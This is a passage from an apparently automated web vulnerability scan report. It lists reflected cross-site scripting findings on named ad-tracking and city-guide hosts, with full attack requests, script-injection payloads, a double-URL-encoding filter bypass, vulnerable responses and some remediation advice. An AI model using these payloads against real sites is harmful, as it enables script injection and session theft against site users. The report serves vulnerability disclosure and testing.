GET /Tracking/V2/BannerCreative/Impression/?siteId='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000013)%3C/script%3E&syndicationOutletId=47146&campaignId=6330&adRotationId=1512115362<script>alert(1)</script>c2ae901adec&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; __qca=P0-856732706-1300545864725

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Thu, 31 Mar 2011 00:53:35 GMT
Expires: Thu, 31 Mar 2011 00:53:36 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQQTCCABA=BJDABGFBNKIJMNOLMEEHBLEG; path=/
X-Powered-By: ASP.NET
Content-Length: 779
Connection: keep-alive

<br>Error Description:Incorrect syntax near '173.193'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = '"--></style></script><script>alert(0x000013)</script>, @bannerCreativeAdModuleId = 21152, @campaignId = 6330, @syndicationOutletId = 47146, @adrotationId = 1512115362<script>alert(1)</script>c2ae901adec, @ipAddress = '173.193.214.243', @sessionId = '358722929', @pixel = '0', @ipNumber = '2915161843', @referer = 'undefined', @browserName = 'Default', @browserVersion = '0.0', @domain = 'undefined', @op
...[SNIP]...
5.57. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [bannerCreativeAdModuleId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The value of the bannerCreativeAdModuleId request parameter is copied into the HTML document as plain text between tags. The payload 11b9c<script>alert(1)</script>0fafab07e80 was submitted in the bannerCreativeAdModuleId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000013)%3C/script%3E&syndicationOutletId=47146&campaignId=6330&adRotationId=15121&bannerCreativeAdModuleId=2115211b9c<script>alert(1)</script>0fafab07e80&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; __qca=P0-856732706-1300545864725

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Thu, 31 Mar 2011 00:53:46 GMT
Expires: Thu, 31 Mar 2011 00:53:47 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCSSDAQTD=DMFLEBDBFICMGDJEEAPNGJDN; path=/
X-Powered-By: ASP.NET
Content-Length: 779
Connection: keep-alive

<br>Error Description:Incorrect syntax near '173.193'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = '"--></style></script><script>alert(0x000013)</script>, @bannerCreativeAdModuleId = 2115211b9c<script>alert(1)</script>0fafab07e80, @campaignId = 6330, @syndicationOutletId = 47146, @adrotationId = 15121, @ipAddress = '173.193.214.243', @sessionId = '320191441', @pixel = '0', @ipNumber = '2915161843', @referer = 'undefined', @bro
...[SNIP]...
5.58. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [campaignId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The value of the campaignId request parameter is copied into the HTML document as plain text between tags. The payload 9ff62<script>alert(1)</script>a02173191c0 was submitted in the campaignId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000013)%3C/script%3E&syndicationOutletId=47146&campaignId=63309ff62<script>alert(1)</script>a02173191c0&adRotationId=15121&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; __qca=P0-856732706-1300545864725

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Thu, 31 Mar 2011 00:53:43 GMT
Expires: Thu, 31 Mar 2011 00:53:43 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCSAQSSSA=ONHBGAMBKDGPKDOKOLCOCKME; path=/
X-Powered-By: ASP.NET
Content-Length: 779
Connection: keep-alive

<br>Error Description:Incorrect syntax near '173.193'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = '"--></style></script><script>alert(0x000013)</script>, @bannerCreativeAdModuleId = 21152, @campaignId = 63309ff62<script>alert(1)</script>a02173191c0, @syndicationOutletId = 47146, @adrotationId = 15121, @ipAddress = '173.193.214.243', @sessionId = '470174562', @pixel = '0', @ipNumber = '2915161843', @referer = 'undefined', @browserName = 'Default'
...[SNIP]...
5.59. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [siteId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The value of the siteId request parameter is copied into the HTML document as plain text between tags. The payload 801ff<script>alert(1)</script>31ecc76c45b was submitted in the siteId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000013)%3C/script%3E801ff<script>alert(1)</script>31ecc76c45b&syndicationOutletId=47146&campaignId=6330&adRotationId=15121&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; __qca=P0-856732706-1300545864725

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Thu, 31 Mar 2011 00:53:28 GMT
Expires: Thu, 31 Mar 2011 00:53:28 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCSCDADCC=GEJBKNEBJAEILNIPENOHAGGD; path=/
X-Powered-By: ASP.NET
Content-Length: 779
Connection: keep-alive

<br>Error Description:Incorrect syntax near '173.193'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = '"--></style></script><script>alert(0x000013)</script>801ff<script>alert(1)</script>31ecc76c45b, @bannerCreativeAdModuleId = 21152, @campaignId = 6330, @syndicationOutletId = 47146, @adrotationId = 15121, @ipAddress = '173.193.214.243', @sessionId = '349885665', @pixel = '0', @ipNumber = '291516
...[SNIP]...
5.60. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [syndicationOutletId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The value of the syndicationOutletId request parameter is copied into the HTML document as plain text between tags. The payload 778a4<script>alert(1)</script>cb1fdeb4541 was submitted in the syndicationOutletId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000013)%3C/script%3E&syndicationOutletId=47146778a4<script>alert(1)</script>cb1fdeb4541&campaignId=6330&adRotationId=15121&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; __qca=P0-856732706-1300545864725

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Thu, 31 Mar 2011 00:53:39 GMT
Expires: Thu, 31 Mar 2011 00:53:40 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCATAABCD=FNGFGBFBAEMHNKPEBBBEDMOA; path=/
X-Powered-By: ASP.NET
Content-Length: 779
Connection: keep-alive

<br>Error Description:Incorrect syntax near '173.193'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = '"--></style></script><script>alert(0x000013)</script>, @bannerCreativeAdModuleId = 21152, @campaignId = 6330, @syndicationOutletId = 47146778a4<script>alert(1)</script>cb1fdeb4541, @adrotationId = 15121, @ipAddress = '173.193.214.243', @sessionId = '353828072', @pixel = '0', @ipNumber = '2915161843', @referer = 'undefined', @browserName = 'Default', @browserVersion = '0.0', @do
...[SNIP]...
5.61. http://www.blogsmithmedia.com/www.citysbest.com/include/background.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blogsmithmedia.com
Path:   /www.citysbest.com/include/background.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f794%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2a4004720cf was submitted in the REST URL parameter 2. This input was echoed as 7f794</script><script>alert(1)</script>2a4004720cf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /www.citysbest.com/include7f794%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2a4004720cf/background.js?9 HTTP/1.1
Host: www.blogsmithmedia.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: Apache/2.2
Content-Length: 17815
Content-Type: text/html
Expires: Sat, 26 Mar 2011 20:36:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 26 Mar 2011 20:36:37 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
5.pfxID="acg";
s_265.pageName=s_265.pfxID+" : "+pageName;
s_265.channel="us.citybest";
s_265.linkInternalFilters="javascript:,citysbest.com";

var isCity = "";
s_265.prop1= isCity !='' ? "include7f794</script><script>alert(1)</script>2a4004720cf" : "national";

var isUrl2 = "background.js";
s_265.prop2= isUrl2 != ''? "background.js" :"main";

s_265.prop12=document.URL.split('?')[0];
s_265.events="";
s_265.products="";
//s_265.purchase
...[SNIP]...
5.62. http://www.blogsmithmedia.com/www.citysbest.com/include/background.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blogsmithmedia.com
Path:   /www.citysbest.com/include/background.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ab3c"><script>alert(1)</script>489e273b4e5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /www.citysbest.com/include1ab3c"><script>alert(1)</script>489e273b4e5/background.js?9 HTTP/1.1
Host: www.blogsmithmedia.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: Apache/2.2
Content-Length: 17459
Content-Type: text/html
Expires: Sat, 26 Mar 2011 20:36:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 26 Mar 2011 20:36:25 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
<meta property="og:url" content="http://www.citysbest.com/include1ab3c"><script>alert(1)</script>489e273b4e5/background.js?9"/>
...[SNIP]...
5.63. http://www.blogsmithmedia.com/www.citysbest.com/include/background.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blogsmithmedia.com
Path:   /www.citysbest.com/include/background.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f2a6%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec6285eeee8c was submitted in the REST URL parameter 3. This input was echoed as 3f2a6</script><script>alert(1)</script>c6285eeee8c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /www.citysbest.com/include/background.js3f2a6%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec6285eeee8c?9 HTTP/1.1
Host: www.blogsmithmedia.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: Apache/2.2
Content-Length: 17390
Content-Type: text/html
Expires: Sat, 26 Mar 2011 20:36:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 26 Mar 2011 20:36:45 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
"+pageName;
s_265.channel="us.citybest";
s_265.linkInternalFilters="javascript:,citysbest.com";

var isCity = "";
s_265.prop1= isCity !='' ? "include" : "national";

var isUrl2 = "background.js3f2a6</script><script>alert(1)</script>c6285eeee8c";
s_265.prop2= isUrl2 != ''? "background.js3f2a6</script>
...[SNIP]...
5.64. http://www.blogsmithmedia.com/www.citysbest.com/include/background.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blogsmithmedia.com
Path:   /www.citysbest.com/include/background.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 806f6"><script>alert(1)</script>d9a439bdd79 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /www.citysbest.com/include/background.js806f6"><script>alert(1)</script>d9a439bdd79?9 HTTP/1.1
Host: www.blogsmithmedia.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: Apache/2.2
Content-Length: 17175
Content-Type: text/html
Expires: Sat, 26 Mar 2011 20:36:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 26 Mar 2011 20:36:43 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
<meta property="og:url" content="http://www.citysbest.com/include/background.js806f6"><script>alert(1)</script>d9a439bdd79?9"/>
...[SNIP]...
5.65. http://www.blogsmithmedia.com/www.citysbest.com/include/citysbest-min.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blogsmithmedia.com
Path:   /www.citysbest.com/include/citysbest-min.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8037%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e465808f0b34 was submitted in the REST URL parameter 2. This input was echoed as d8037</script><script>alert(1)</script>465808f0b34 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /www.citysbest.com/included8037%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e465808f0b34/citysbest-min.js?29 HTTP/1.1
Host: www.blogsmithmedia.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: Apache/2.2
Content-Length: 17836
Content-Type: text/html
Expires: Sat, 26 Mar 2011 20:36:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 26 Mar 2011 20:36:37 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
5.pfxID="acg";
s_265.pageName=s_265.pfxID+" : "+pageName;
s_265.channel="us.citybest";
s_265.linkInternalFilters="javascript:,citysbest.com";

var isCity = "";
s_265.prop1= isCity !='' ? "included8037</script><script>alert(1)</script>465808f0b34" : "national";

var isUrl2 = "citysbest-min.js";
s_265.prop2= isUrl2 != ''? "citysbest-min.js" :"main";

s_265.prop12=document.URL.split('?')[0];
s_265.events="";
s_265.products="";
//s_265.pu
...[SNIP]...
5.66. http://www.blogsmithmedia.com/www.citysbest.com/include/citysbest-min.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blogsmithmedia.com
Path:   /www.citysbest.com/include/citysbest-min.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 464e5"><script>alert(1)</script>58128cfd51f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /www.citysbest.com/include464e5"><script>alert(1)</script>58128cfd51f/citysbest-min.js?29 HTTP/1.1
Host: www.blogsmithmedia.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: Apache/2.2
Content-Length: 17474
Content-Type: text/html
Expires: Sat, 26 Mar 2011 20:36:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 26 Mar 2011 20:36:24 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
<meta property="og:url" content="http://www.citysbest.com/include464e5"><script>alert(1)</script>58128cfd51f/citysbest-min.js?29"/>
...[SNIP]...
5.67. http://www.blogsmithmedia.com/www.citysbest.com/include/citysbest-min.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blogsmithmedia.com
Path:   /www.citysbest.com/include/citysbest-min.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31cbd%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e77e4b54285b was submitted in the REST URL parameter 3. This input was echoed as 31cbd</script><script>alert(1)</script>77e4b54285b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /www.citysbest.com/include/citysbest-min.js31cbd%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e77e4b54285b?29 HTTP/1.1
Host: www.blogsmithmedia.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: Apache/2.2
Content-Length: 17410
Content-Type: text/html
Expires: Sat, 26 Mar 2011 20:36:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 26 Mar 2011 20:36:46 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
pageName;
s_265.channel="us.citybest";
s_265.linkInternalFilters="javascript:,citysbest.com";

var isCity = "";
s_265.prop1= isCity !='' ? "include" : "national";

var isUrl2 = "citysbest-min.js31cbd</script><script>alert(1)</script>77e4b54285b";
s_265.prop2= isUrl2 != ''? "citysbest-min.js31cbd</script>
...[SNIP]...
5.68. http://www.blogsmithmedia.com/www.citysbest.com/include/citysbest-min.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blogsmithmedia.com
Path:   /www.citysbest.com/include/citysbest-min.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cdafe"><script>alert(1)</script>f56c1613a2b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /www.citysbest.com/include/citysbest-min.jscdafe"><script>alert(1)</script>f56c1613a2b?29 HTTP/1.1
Host: www.blogsmithmedia.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: Apache/2.2
Content-Length: 17196
Content-Type: text/html
Expires: Sat, 26 Mar 2011 20:36:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 26 Mar 2011 20:36:43 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
<meta property="og:url" content="http://www.citysbest.com/include/citysbest-min.jscdafe"><script>alert(1)</script>f56c1613a2b?29"/>
...[SNIP]...
5.69. http://www.citysbest.com/media/citysbest-min.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.citysbest.com
Path:   /media/citysbest-min.css

Issue detail

